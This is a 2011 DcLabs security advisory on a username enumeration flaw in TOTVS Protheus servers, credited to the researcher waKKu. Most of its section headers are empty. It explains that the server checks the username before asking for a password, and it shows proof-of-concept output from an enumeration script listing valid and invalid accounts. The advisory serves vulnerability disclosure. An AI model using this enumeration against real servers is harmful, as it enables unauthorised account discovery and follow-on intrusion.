[DCA-2011-0002]
[Discussion]
[Software]
[Vendor Product Description - Portuguese]
[Advisory Timeline]
[Bug Summary]
[Impact]
[Affected Version]
[Bug Description and Proof of Concept]
The server validates the user before asking for a password, thus we
can keep trying usernames until we get a password prompt.
A Proof of Concept has been created:
— command line output begin —
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help
options:
–version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
–ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
— command line output end —
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Workarounds]
[Credits]
DcLabs Security Research Group.
Atenciosamente,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com